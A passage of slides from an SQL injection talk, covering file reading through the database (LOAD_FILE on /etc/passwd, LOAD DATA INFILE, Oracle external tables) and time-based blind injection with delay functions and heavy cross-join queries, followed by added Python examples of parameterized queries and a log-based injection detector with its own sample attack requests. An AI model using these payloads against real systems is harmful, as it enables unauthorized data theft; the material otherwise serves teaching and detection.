  • 31. MySQL: LoadFile: SELECT LOAD_FILE('/etc/passwd') SQLbfTools: MySQLget command (illo and dab) http://www.reversing.org/node/view/11 Load Data infile: ; Create table C8DFC643 (datos varchar(4000)) ; Load data infile 'c:\boot.ini' into table C8DFC643 ; alter table C8DFC643 add column num integer auto_increment unique key and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1) and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) ; Drop table C8DFC643
  • 32. Oracle – Plain Text files: External Tables. ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- Only Plain Text files
  • 33. Oracle – DBMS_LOB: ; execute immediate ' DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;' ; end; --
  • 36. Time-Based Blind SQL Injection: In scenarios with no differences between "True-Answer Page" and "False-Answer Page", time delays can be used. The injection forces a delay in the response page when the injected condition is True. Delay functions: SQL Server: waitfor; Oracle: dbms_lock.sleep; MySQL: sleep or Benchmark function; Postgres: pg_sleep. Ex: ; if (exists(select * from users)) waitfor delay '0:0:5'
  • 37. Exploit for Solar Empire Web Game
  • 38. Time-Based Blind SQL Injection: What about database engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc.? Can we still exploit Time-Based Blind SQL Injection attacks?
  • 40. "Where-Clause" execution order: Select "whatever" From whatever Where condition1 and condition2. Condition1 lasts 10 seconds; Condition2 lasts 100 seconds. Which condition should be executed first?
  • 43. Time-Based Blind SQL Injection using Heavy Queries: The attacker can perform an exploitation by delaying the "True-answer page" using a heavy query. It depends on how the database engine evaluates the where clauses in the query. There are two types of database engines: databases without an optimization process and databases with an optimization process.
  • 44. Time-Based Blind SQL Injection using Heavy Queries: The attacker could inject a heavy Cross-Join condition to delay the response page in True-Injections. The Cross-join injection must be heavier than the other condition. The attacker only has to know or guess the name of a table with select permission in the database. Example in MSSQL: Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 45. "Default" tables to construct a heavy query: Microsoft SQL Server: sysusers; Oracle: all_users; MySQL (version 5): information_schema.columns; Microsoft Access: MSysAccessObjects (97 & 2000 versions), MSysAccessStorage (2003 & 2007)
  • 46. "Default" tables to construct a heavy query: …or whatever you can guess: Clients, Customers, News, Logins, Users, Providers… Use your imagination…
  • 47. Ex 1: MS SQL Server Query takes 14 seconds -> True-Answer
  • 48. Ex 1: MS SQL Server Query takes 1 second -> False-Answer
  • 49. Ex 2: Oracle Query takes 22 seconds -> True-Answer
  • 50. Ex 2: Oracle Query takes 1 second -> False-Answer
  • 51. Ex 3: Access 2007 Query takes 39 seconds -> True-Answer
  • 52. Ex 3: Access 2007 Query takes 1 second -> False-Answer
  • 53. Marathon Tool: Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle databases. Schema extraction from known databases. Extracts data using heavy queries no matter which database engine (without schema). Developed in .NET. Source code available: http://www.codeplex.com/marathontool
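The login query from slides 3 and 4 beside a parameterized version, as an added example that is not part of the deck: Python with an in-memory SQLite table standing in for the users table (the table, the Admin row and its password are constructed for the demo; SQLite is an assumption in place of the SQL Server and MySQL backends the deck discusses). The concatenated query accepts the `' or '1'='1` password from slide 4, while the bound-parameter version compares that same string as one opaque value and rejects it.

```python
import sqlite3

# Constructed demo database: SQLite stands in for the SQL Server/MySQL backends
# the deck discusses; the table, the Admin row and its password are invented.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users_table (id INTEGER PRIMARY KEY, login TEXT, passw TEXT)")
    con.execute("INSERT INTO users_table (login, passw) VALUES ('Admin', 'demo-only-password')")
    con.commit()
    return con

def login_concatenated(con: sqlite3.Connection, user: str, password: str) -> bool:
    # The slide 3 query built the 90s way: raw input is spliced into the SQL text,
    # so a quote in the password closes the literal and the rest becomes SQL syntax.
    sql = f"SELECT id FROM users_table WHERE login='{user}' AND passw='{password}'"
    return con.execute(sql).fetchone() is not None

def login_parameterized(con: sqlite3.Connection, user: str, password: str) -> bool:
    # Same query with bound parameters: the driver sends the values separately from
    # the statement text, so the password is compared as one string, quotes and all.
    sql = "SELECT id FROM users_table WHERE login=? AND passw=?"
    return con.execute(sql, (user, password)).fetchone() is not None

def demo() -> dict:
    """Run both variants against the slide 4 payload and against the real password."""
    con = make_db()
    payload = "' or '1'='1"  # the password typed into the form on slide 4
    return {
        "concatenated_bypassed": login_concatenated(con, "Admin", payload),
        "parameterized_bypassed": login_parameterized(con, "Admin", payload),
        "parameterized_real_login": login_parameterized(con, "Admin", "demo-only-password"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The concatenated variant also returns database error text straight to the caller, which is the ODBC error-message leak of slide 6; a parameterized query removes the injection, and catching driver exceptions and returning a generic failure removes the information channel.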
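A log-side check for the request patterns the deck describes (the slide 4 tautology, the ASCII/Substring booleanization of slide 19, the delay functions of slide 36, the FOR XML and GROUP_CONCAT serialization of slides 11 and 12, the OPENROWSET/BULK/LOAD_FILE file access of slides 28 to 31, and the repeated-alias cross join of slide 44 together with the slow response it produces), as an added example that is not part of the deck or of the Marathon Tool. It is Python run over a constructed access-log sample whose last field is assumed to be the response time in milliseconds; the IPs, paths, timings and the file path in the sample are invented. The cross-join check is generalized beyond the default tables of slide 45 to any table aliased three or more times in one query, since slide 46 notes that any guessable table works.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import unquote_plus

# Constructed access-log sample (combined format plus a trailing response time in
# milliseconds). Requests are modelled on the deck's payloads; IPs, paths, timings
# and the 'c:\example.txt' path are invented for the demo.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /Program.php?id=1 HTTP/1.1" 200 5120 23
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /Program.php?id=1%20and%20100%3E(ASCII(Substring(user(),1,1))) HTTP/1.1" 200 5120 25
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /Program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2,%20sysusers%20as%20sys3,%20sysusers%20AS%20sys4)%3E1%20and%20300%3E(select%20top%201%20ascii(substring(name,1,1))%20from%20sysusers) HTTP/1.1" 200 5120 14020
198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /Program.php?id=1;%20if%20(exists(select%20*%20from%20users))%20waitfor%20delay%20'0:0:5' HTTP/1.1" 200 5120 5004
198.51.100.7 - - [10/Oct/2023:14:01:09 +0000] "GET /search.php?q=1'%20union%20select%20'1','2','3',(select%20*%20from%20sysusers%20for%20xml%20raw,%20binary%20base64) HTTP/1.1" 200 9000 40
192.0.2.9 - - [10/Oct/2023:14:10:00 +0000] "GET /login.php?user=Admin&pass='%20or%20'1'%3D'1 HTTP/1.1" 302 0 12
192.0.2.9 - - [10/Oct/2023:14:10:30 +0000] "GET /Program.php?id=1%20and%20256%3EASCII(SUBSTRING((SELECT%20*%20FROM%20OPENROWSET(BULK%20'c:%5Cexample.txt',%20SINGLE_BLOB)%20As%20Data),1,1)) HTTP/1.1" 500 300 30
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<ms>\d+)$'
)

# One regex per technique from the deck, applied to the URL-decoded request path.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
    "booleanization": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "time_delay": re.compile(
        r"waitfor\s+delay|dbms_lock\.sleep|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I),
    "serialization": re.compile(r"\bfor\s+xml\s+raw\b|\bgroup_concat\s*\(", re.I),
    "file_access": re.compile(
        r"\bopenrowset\s*\(|\bopendatasource\s*\(|\bbulk\s+insert\b|\bload_file\s*\(|"
        r"\bload\s+data\s+infile\b|\bdbms_lob\.", re.I),
}
# "table AS alias" pairs; the same table aliased repeatedly is the heavy cross join.
ALIAS_RE = re.compile(r"\b(\w+(?:\.\w+)?)\s+as\s+\w+", re.I)
SLOW_MS = 3000  # assumed threshold; tune to the application's normal response time

@dataclass
class Finding:
    ip: str
    path: str
    ms: int
    tags: list = field(default_factory=list)

def heavy_join_tables(sql: str, min_repeats: int = 3) -> list:
    """Tables aliased at least min_repeats times in one statement (slide 44 pattern)."""
    counts = Counter(t.lower() for t in ALIAS_RE.findall(sql))
    return sorted(t for t, n in counts.items() if n >= min_repeats)

def analyse_log(text: str, slow_ms: int = SLOW_MS) -> list:
    """Tag each request with the injection techniques it matches; untagged lines are dropped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format; a real pipeline would count and report these
        decoded = unquote_plus(m["path"])
        tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if heavy_join_tables(decoded):
            tags.append("heavy_cross_join")
        ms = int(m["ms"])
        # A slow answer only matters once SQL is present: that is the time-based signal.
        if tags and ms >= slow_ms:
            tags.append("slow_response")
        if tags:
            findings.append(Finding(m["ip"], decoded, ms, tags))
    return findings

def summarize_by_source(findings: list) -> dict:
    """Collapse findings to one sorted tag list per source IP for triage."""
    out = {}
    for f in findings:
        out.setdefault(f.ip, set()).update(f.tags)
    return {ip: sorted(tags) for ip, tags in out.items()}

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"{f.ip} {f.ms:>6} ms {','.join(f.tags):<45} {f.path[:60]}")
    print(summarize_by_source(analyse_log(SAMPLE_LOG)))
```

The response-time tag is what catches the slide 44 technique on engines that have no delay function: the request body looks like any other boolean condition, but a `count(*)` over several self-aliased copies of a system table is both a recognizable shape and, per the deck's measurements, an answer that takes tens of seconds instead of one. Requests on the same source alternating between fast and slow with near-identical parameters are the follow-up signal to look for.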